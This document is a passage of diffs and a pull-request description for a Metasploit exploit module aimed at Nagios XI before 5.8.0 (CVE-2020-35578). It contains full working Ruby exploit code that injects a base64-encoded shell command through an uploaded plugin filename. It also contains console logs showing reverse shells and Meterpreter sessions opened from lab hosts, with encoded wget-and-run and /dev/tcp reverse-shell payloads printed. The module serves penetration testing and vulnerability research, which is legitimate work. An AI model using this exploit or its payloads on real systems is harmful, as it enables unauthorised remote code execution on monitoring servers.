+   FINISH_INSTALL  false            no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                              address on the local machine or 0.0.0.0 to listen on all addresses
+                                              .
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_bash):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   CMD
+
+
 msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
 
-[*] Started reverse TCP handler on 192.168.1.12:4012 
+[*] Started reverse TCP handler on 192.168.1.12:4444 
 [*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
 [+] Successfully authenticated to Nagios XI
-[*] Target is Nagios XI with version 5.7.3
+[*] Target is Nagios XI with version 5.7.5
 [+] The target appears to be vulnerable.
 [*] Executing the payload
-[*] Command shell session 2 opened (192.168.1.12:4012 -> 192.168.1.14:40864) at 2021-02-01 12:35:09 -0500
-[+] Deleted /usr/local/nagios/libexec/;echo MDwmNTYtO2V4ZWMgNTY8Pi9kZXYvdGNwLzE5Mi4xNjguOTEuMTI4LzQwMTI7c2ggPCY1NiA+JjU2IDI+JjU2 | base64 -d | bash;#
+[+] Deleted /usr/local/nagios/libexec/;echo MDwmMTcwLTtleGVjIDE3MDw+L2Rldi90Y3AvMTkyLjE2OC45MS4xMjgvNDQ0NDtzaCA8JjE3MCA+JjE3MCAyPiYxNzA= | base64 -d | bash;#
+[*] Command shell session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42834) at 2021-04-01 11:57:38 -0400
 
 id
-uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
+uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd) context=system_u:system_r:httpd_t:s0
+```
+### Nagios XI 5.7.5 running on CentOS 7 (unfinished installation) - Linux target
+```
+msf6 > use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce 
+[*] Using configured payload linux/x86/meterpreter/reverse_tcp
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set rhosts 192.168.1.14
+rhosts => 192.168.1.14
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set lhost 192.168.1.12
+lhost => 192.168.1.12
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set password nagiosadmin
+password => nagiosadmin
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > set finish_install true
+finish_install => true
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 
+
+Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):
+
+   Name            Current Setting  Required  Description
+   ----            ---------------  --------  -----------
+   FINISH_INSTALL  true             no        If the Nagios XI installation has not been completed, try to do so
+                                              . This includes signing the license agreement.
+   PASSWORD        nagiosadmin      yes       Password to authenticate with
+   Proxies                          no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS          192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with synt
+                                              ax 'file:<path>'
+   RPORT           80               yes       The target port (TCP)
+   SRVHOST         0.0.0.0          yes       The local host or network interface to listen on. This must be an
+                                              address on the local machine or 0.0.0.0 to listen on all addresses
+                                              .
+   SRVPORT         8080             yes       The local port to listen on.
+   SSL             false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                          no        Path to a custom SSL certificate (default is randomly generated)
+   TARGETURI       /nagiosxi/       yes       The base path to the Nagios XI application
+   URIPATH                          no        The URI to use for this exploit (default is random)
+   USERNAME        nagiosadmin      yes       Username to authenticate with
+   VHOST                            no        HTTP server virtual host
+
+
+Payload options (linux/x86/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Linux
+
+
+msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run
+
+[*] Started reverse TCP handler on 192.168.1.12:4444 
+[*] Executing automatic check (disable AutoCheck to override)
+[*] Attempting to authenticate to Nagios XI...
+[!] The target seems to be a Nagios XI application that has not been fully installed yet.
+[*] Attempting to finish the Nagios XI installation on the target using the provided password. The username will be `nagiosadmin`.
+[*] Attempting to authenticate to Nagios XI...
+[!] The Nagios XI license agreement has not yet been signed on the target.
+[*] Attempting to sign the Nagios XI license agreement...
+[*] Attempting to authenticate to Nagios XI...
+[!] No response received from the server. This can happen after installing Nagios XI or signing the license agreement
+[*] The module will wait for 5 seconds and retry.
+[*] Attempting to authenticate to Nagios XI...
+[+] Successfully authenticated to Nagios XI
+[*] Target is Nagios XI with version 5.7.5
+[+] The target appears to be vulnerable.
+[*] Using URL: http://0.0.0.0:8080/i72tfV
+[*] Local IP: http://192.168.1.12:8080/i72tfV
+[*] Client 192.168.1.14 (Wget/1.14 (linux-gnu)) requested /i72tfV
+[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
+[*] Sending stage (980808 bytes) to 192.168.1.14
+[*] Command Stager progress - 100.00% done (113/113 bytes)
+[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9WWG1ycU5payBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9pNzJ0ZlY7Y2htb2QgK3ggL3RtcC9WWG1ycU5pazsvdG1wL1ZYbXJxTmlrO3JtIC1mIC90bXAvVlhtcnFOaWs= | base64 -d | bash;#
+[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.14:42790) at 2021-04-01 11:52:51 -0400
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
 ```

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -16,11 +16,12 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Nagios XI 5.3.0-5.7.9 - Plugins Filename Authenticated Remote Code Exection',
+        'Name' => 'Nagios XI Prior to 5.8.0 - Plugins Filename Authenticated Remote Code Exection',
         'Description' => %q{
-          This module exploits a vulnerability in `/admin/monitoringplugins.php` that
-          enables an authenticated admin user to achieve remote code execution as the
-          `apache` user by uploading a malicious plugin.
+          This module exploits a command injection vulnerability (CVE-2020-35578) in the `/admin/monitoringplugins.php`
+          page of Nagios XI versions prior to 5.8.0 when uploading plugins. Successful exploitation allows
+          an authenticated admin user to achieve remote code execution as the `apache` user by uploading
+          a malicious plugin.
 
           Valid credentials for a Nagios XI admin user are required. This module has
           been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both
@@ -42,7 +43,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets' =>
           [
             [
-              'Linux', {
+              'Linux (x86/x64)', {
                 'Arch' => [ARCH_X86, ARCH_X64],
                 'Platform' => 'linux',
                 # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation
@@ -63,7 +64,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'DefaultTarget' => 0,
         'Notes' =>
           {
-            'Stability' => [ CRASH_SAFE, ],
+            'Stability' => [ CRASH_SAFE ],
             'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
             'Reliability' => [FIRST_ATTEMPT_FAIL] # payload may not connect back the first time
           }
@@ -140,8 +141,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Target is Nagios XI with version #{nagios_version}")
     # check if the target is actually vulnerable
-    version = Rex::Version.new(nagios_version)
-    if version < Rex::Version.new('5.8.0')
+    @version = Rex::Version.new(nagios_version)
+    if @version < Rex::Version.new('5.8.0')
       return CheckCode::Appears
     end
 
@@ -149,7 +150,8 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def execute_command(cmd, _opts = {})
-    # encode the payload, which is necessary for the exploit to work
+    # Convert the payload to hex ASCII and then Base64 encode the payload.
+    # This is necessary for the exploit to work.
     payload_ascii = Rex::Text.to_hex_ascii(cmd)
     payload_base64 = Rex::Text.encode_base64(payload_ascii)
     payload = ";echo #{payload_base64} | base64 -d | bash;#"
@@ -174,6 +176,10 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
+    if @version < Rex::Version.new('5.3.0')
+      fail_with(Failure::NoTarget, "Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!")
+    end
+
     # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload
     res = send_request_cgi({
       'method' => 'GET',

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -16,14 +16,15 @@ class MetasploitModule < Msf::Exploit::Remote
     super(
       update_info(
         info,
-        'Name' => 'Nagios XI 5.7.X - Plugins Filename Authenticated Remote Code Exection',
+        'Name' => 'Nagios XI 5.3.0-5.7.9 - Plugins Filename Authenticated Remote Code Exection',
         'Description' => %q{
           This module exploits a vulnerability in `/admin/monitoringplugins.php` that
           enables an authenticated admin user to achieve remote code execution as the
           `apache` user by uploading a malicious plugin.
 
           Valid credentials for a Nagios XI admin user are required. This module has
-          been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+          been successfully tested against Nagios versions XI 5.3.0 and 5.7.5, both
+          running on CentOS 7.
         },
         'License' => MSF_LICENSE,
         'Author' =>
@@ -59,7 +60,13 @@ class MetasploitModule < Msf::Exploit::Remote
           ],
         'Privileged' => false,
         'DisclosureDate' => '2020-12-19',
-        'DefaultTarget' => 0
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [ CRASH_SAFE, ],
+            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, CONFIG_CHANGES ],
+            'Reliability' => [FIRST_ATTEMPT_FAIL] # payload may not connect back the first time
+          }
       )
     )
 
@@ -77,28 +84,68 @@ class MetasploitModule < Msf::Exploit::Remote
     datastore['PASSWORD']
   end
 
+  def finish_install
+    datastore['FINISH_INSTALL']
+  end
+
   def check
-    # obtain cookies required for authentication
-    cookies = nagios_xi_login(username, password)
-    if cookies.instance_of? Msf::Exploit::CheckCode
-      return cookies
+    # Use nagios_xi_login to try and authenticate. If authentication succeeds, nagios_xi_login returns
+    # an array containing the http response body of a get request to index.php and the session cookies
+    login_result, res_array = nagios_xi_login(username, password, finish_install)
+    case login_result
+    when 1..3 # An error occurred
+      return CheckCode::Unknown(res_array[0])
+    when 4 # Nagios XI is not fully installed
+      install_result = install_nagios_xi(password)
+      if install_result
+        return CheckCode::Unknown(install_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3 # An error occurred
+        return CheckCode::Unknown(res_array[0])
+      when 4 # Nagios XI is still not fully installed
+        return CheckCode::Detected('Failed to install Nagios XI on the target.')
+      end
     end
 
-    # authenticate and obtain the Nagios XI version
+    # when 5 is excluded from the case statement above to prevent having to use this code block twice.
+    # Including when 5 would require using this code block once at the end of the `when 4` code block above, and once here.
+    if login_result == 5 # the Nagios XI license agreement has not been signed
+      auth_cookies, nsp = res_array
+      sign_license_result = sign_license_agreement(auth_cookies, nsp)
+      if sign_license_result
+        return CheckCode::Unknown(sign_license_result[1])
+      end
+
+      login_result, res_array = login_after_install_or_license(username, password, finish_install)
+      case login_result
+      when 1..3
+        return CheckCode::Unknown(res_array[0])
+      when 5 # the Nagios XI license agreement still has not been signed
+        return CheckCode::Detected('Failed to sign the license agreement.')
+      end
+    end
+
     print_good('Successfully authenticated to Nagios XI')
-    version = nagios_xi_version_index(cookies)
-    if version.instance_of? Msf::Exploit::CheckCode
-      return version
+
+    # Obtain the Nagios XI version
+    @auth_cookies = res_array[1] # if we are here, this cannot be nil since the mixin checks for that already
+
+    nagios_version = nagios_xi_version(res_array[0])
+    if nagios_version.nil?
+      return CheckCode::Detected('Unable to obtain the Nagios XI version from the dashboard')
     end
 
-    print_status("Target is Nagios XI with version #{version}")
-
+    print_status("Target is Nagios XI with version #{nagios_version}")
     # check if the target is actually vulnerable
-    unless Gem::Version.new(version) < Gem::Version.new('5.8.0')
-      return Exploit::CheckCode::Safe
+    version = Rex::Version.new(nagios_version)
+    if version < Rex::Version.new('5.8.0')
+      return CheckCode::Appears
     end
 
-    return Exploit::CheckCode::Appears
+    return CheckCode::Safe
   end
 
   def execute_command(cmd, _opts = {})
@@ -121,6 +168,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'method' => 'POST',
       'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
       'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => @auth_cookies,
       'data' => post_data.to_s
     }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
   end
@@ -129,7 +177,8 @@ class MetasploitModule < Msf::Exploit::Remote
     # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload
     res = send_request_cgi({
       'method' => 'GET',
-      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')
+      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
+      'cookie' => @auth_cookies
     })
 
     unless res

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -141,6 +141,9 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("Target is Nagios XI with version #{nagios_version}")
     # check if the target is actually vulnerable
+    if /^\d{4}R\d\.\d/.match(nagios_version) || /^\d{4}RC\d/.match(nagios_version) || /^\d{4}R\d.\d[A-Ha-h]/.match(nagios_version) || nagios_version == '5R1.0'
+      nagios_version = '1.0.0' # Set to really old version as a placeholder. Basically we don't want to exploit these versions.
+    end
     @version = Rex::Version.new(nagios_version)
     if @version < Rex::Version.new('5.8.0')
       return CheckCode::Appears

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -177,7 +177,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     if @version < Rex::Version.new('5.3.0')
-      fail_with(Failure::NoTarget, "Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!")
+      fail_with(Failure::NoTarget, 'Target is vulnerable but this module currently does not support exploiting target prior to 5.3.0!')
     end
 
     # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload

--- a/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
+++ b/modules/exploits/linux/http/nagios_xi_plugins_filename_authenticated_rce.rb
@@ -1,0 +1,157 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HTTP::NagiosXi
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Nagios XI 5.7.X - Plugins Filename Authenticated Remote Code Exection',
+        'Description' => %q{
+          This module exploits a vulnerability in `/admin/monitoringplugins.php` that
+          enables an authenticated admin user to achieve remote code execution as the
+          `apache` user by uploading a malicious plugin.
+
+          Valid credentials for a Nagios XI admin user are required. This module has
+          been successfully tested against Nagios XI 5.7.3 running on CentOS 7.
+        },
+        'License' => MSF_LICENSE,
+        'Author' =>
+          [
+            'Haboob Team', # https://haboob.sa - PoC
+            'Erik Wynter' # @wyntererik - Metasploit'
+          ],
+        'References' =>
+          [
+            ['CVE', '2020-35578'],
+            ['EDB', '49422']
+          ],
+        'Platform' => %w[linux unix],
+        'Arch' => [ ARCH_X86, ARCH_X64, ARCH_CMD],
+        'Targets' =>
+          [
+            [
+              'Linux', {
+                'Arch' => [ARCH_X86, ARCH_X64],
+                'Platform' => 'linux',
+                # only the wget and perhaps the curl CmdStagers work against a typical Nagios XI host (CentOS 7 minimal) if Nagios XI was installed according to the documentation
+                'CmdStagerFlavor' => :wget,
+                'DefaultOptions' => { 'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp' }
+              }
+            ],
+            [
+              'CMD', {
+                'Arch' => [ARCH_CMD],
+                'Platform' => 'unix',
+                'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' }
+              }
+            ]
+          ],
+        'Privileged' => false,
+        'DisclosureDate' => '2020-12-19',
+        'DefaultTarget' => 0
+      )
+    )
+
+    register_options [
+      OptString.new('USERNAME', [true, 'Username to authenticate with', 'nagiosadmin']),
+      OptString.new('PASSWORD', [true, 'Password to authenticate with', nil])
+    ]
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def check
+    # obtain cookies required for authentication
+    cookies = nagios_xi_login(username, password)
+    if cookies.instance_of? Msf::Exploit::CheckCode
+      return cookies
+    end
+
+    # authenticate and obtain the Nagios XI version
+    print_good('Successfully authenticated to Nagios XI')
+    version = nagios_xi_version_index(cookies)
+    if version.instance_of? Msf::Exploit::CheckCode
+      return version
+    end
+
+    print_status("Target is Nagios XI with version #{version}")
+
+    # check if the target is actually vulnerable
+    unless Gem::Version.new(version) < Gem::Version.new('5.8.0')
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Appears
+  end
+
+  def execute_command(cmd, _opts = {})
+    # encode the payload, which is necessary for the exploit to work
+    payload_ascii = Rex::Text.to_hex_ascii(cmd)
+    payload_base64 = Rex::Text.encode_base64(payload_ascii)
+    payload = ";echo #{payload_base64} | base64 -d | bash;#"
+    register_file_for_cleanup("/usr/local/nagios/libexec/#{payload}") # deleting the payload via the web interface doesn't seem possible
+
+    # generate post data
+    post_data = Rex::MIME::Message.new
+    random_post_content = rand_text_alphanumeric(8..12)
+    post_data.add_part('', nil, nil, 'form-data; name="upload"')
+    post_data.add_part(@nsp, nil, nil, 'form-data; name="nsp"')
+    post_data.add_part(random_post_content, 'text/plain', nil, "form-data; name=\"uploadedfile\"; filename=\"#{payload}\"")
+    post_data.add_part('1', nil, nil, 'form-data; name="convert_to_unix"')
+
+    # upload payload
+    send_request_cgi({
+      'method' => 'POST',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php'),
+      'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
+      'data' => post_data.to_s
+    }, 0) # don't wait for a response from the target, otherwise the module will hang for a few seconds after executing the payload
+  end
+
+  def exploit
+    # visit /admin/monitoringplugins.php in order to get the nsp token required to upload the payload
+    res = send_request_cgi({
+      'method' => 'GET',
+      'uri' => normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')
+    })
+
+    unless res
+      fail_with(Failure::Disconnected, "Connection failed while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
+    end
+
+    unless res.code == 200 && res.body.include?('<title>Manage Plugins &middot; Nagios XI</title>')
+      fail_with(Failure::UnexpectedReply, "Unexpected response received while trying to visit `#{normalize_uri(target_uri.path, 'admin', 'monitoringplugins.php')}`")
+    end
+
+    # grab the nsp token, using the Nagios XI mixin
+    @nsp = get_nsp(res)
+
+    if @nsp.blank?
+      fail_with(Failure::Unknown, 'Failed to obtain the nsp token required to upload the payload')
+    end
+
+    if target.arch.first == ARCH_CMD
+      print_status('Executing the payload')
+      execute_command(payload.encoded)
+    else
+      execute_cmdstager(background: true)
+    end
+  end
+end


### PR DESCRIPTION
## About
This changes adds a module to `modules/exploit/linux/http/` that exploits an OS command injection vulnerability  (CVE-2020-35578) in Naxios XI version 5.7.X (and possibly older versions) to achieve remote code execution as the `apache` user. The `check` method takes advantage of the Nagios XI mixin introduced in PR #14697. This PR also adds documentation.

## Vulnerable Application
Nagios XI version 5.7.X (and possibly older versions)

## Verification Steps
1. Start msfconsole
2. Do: `use exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce`
3. Do: `set RHOSTS [IP]`
4. Do: `set USERNAME [username for the Nagios XI account]`
5. Do: `set PASSWORD [password for the Nagios XI account]`
6. Do: `set target [target]`
7. Do: `set payload [payload]`
8. Do: `set LHOST [IP]`
9. Do: `exploit`

## Options
### PASSWORD
The password for the Nagios XI account to authenticate with.
### TARGETURI
The base path to Nagios XI. The default value is `/nagiosxi/`.
### USERNAME
The username for the Nagios XI account to authenticate with. The default value is `nagiosadmin`.

## Targets
```
Id  Name
--  ----
0   Linux
1   CMD
```

## Scenarios
### Nagios XI 5.7.3 running on CentOS 7 - Linux target
```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > show options 

Module options (exploit/linux/http/nagios_xi_plugins_filename_authenticated_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD   nagiosadmin      yes       Password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.14     yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /nagiosxi/       yes       The base path to the NagiosXi application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME   nagiosadmin      yes       Username to authenticate with
   VHOST                       no        HTTP server virtual host


Payload options (linux/x86/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.12     yes       The listen address (an interface may be specified)
   LPORT  4011             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Linux


msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4011 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Using URL: http://0.0.0.0:8080/eaGWp8C5GQVvqG
[*] Local IP: http://192.168.1.12:8080/eaGWp8C5GQVvqG
[*] Client 192.168.1.14 (Wget/1.14 (linux-gnu)) requested /eaGWp8C5GQVvqG
[*] Sending payload to 192.168.1.14 (Wget/1.14 (linux-gnu))
[*] Sending stage (976712 bytes) to 192.168.1.14
[*] Command Stager progress - 100.00% done (121/121 bytes)
[*] Meterpreter session 1 opened (192.168.1.12:4011 -> 192.168.1.14:48622) at 2021-02-01 12:33:13 -0500
[*] Server stopped.
[!] This exploit may require manual cleanup of '/usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#' on the target

meterpreter > 
[+] Deleted /usr/local/nagios/libexec/;echo d2dldCAtcU8gL3RtcC9oanVBa3lrYSBodHRwOi8vMTkyLjE2OC45MS4xMjg6ODA4MC9lYUdXcDhDNUdRVnZxRztjaG1vZCAreCAvdG1wL2hqdUFreWthOy90bXAvaGp1QWt5a2E7cm0gLWYgL3RtcC9oanVBa3lrYQ== | base64 -d | bash;#
getuid
Server username: apache @ localhost.localdomain (uid=48, gid=48, euid=48, egid=48)
```
### Nagios XI 5.7.3 running on CentOS 7 - CMD target
```
msf6 exploit(linux/http/nagios_xi_plugins_filename_authenticated_rce) > run

[*] Started reverse TCP handler on 192.168.1.12:4012 
[*] Executing automatic check (disable AutoCheck to override)
[+] Successfully authenticated to Nagios XI
[*] Target is Nagios XI with version 5.7.3
[+] The target appears to be vulnerable.
[*] Executing the payload
[*] Command shell session 2 opened (192.168.1.12:4012 -> 192.168.1.14:40864) at 2021-02-01 12:35:09 -0500
[+] Deleted /usr/local/nagios/libexec/;echo MDwmNTYtO2V4ZWMgNTY8Pi9kZXYvdGNwLzE5Mi4xNjguOTEuMTI4LzQwMTI7c2ggPCY1NiA+JjU2IDI+JjU2 | base64 -d | bash;#

id
uid=48(apache) gid=48(apache) groups=48(apache),1000(nagios),1001(nagcmd)
```
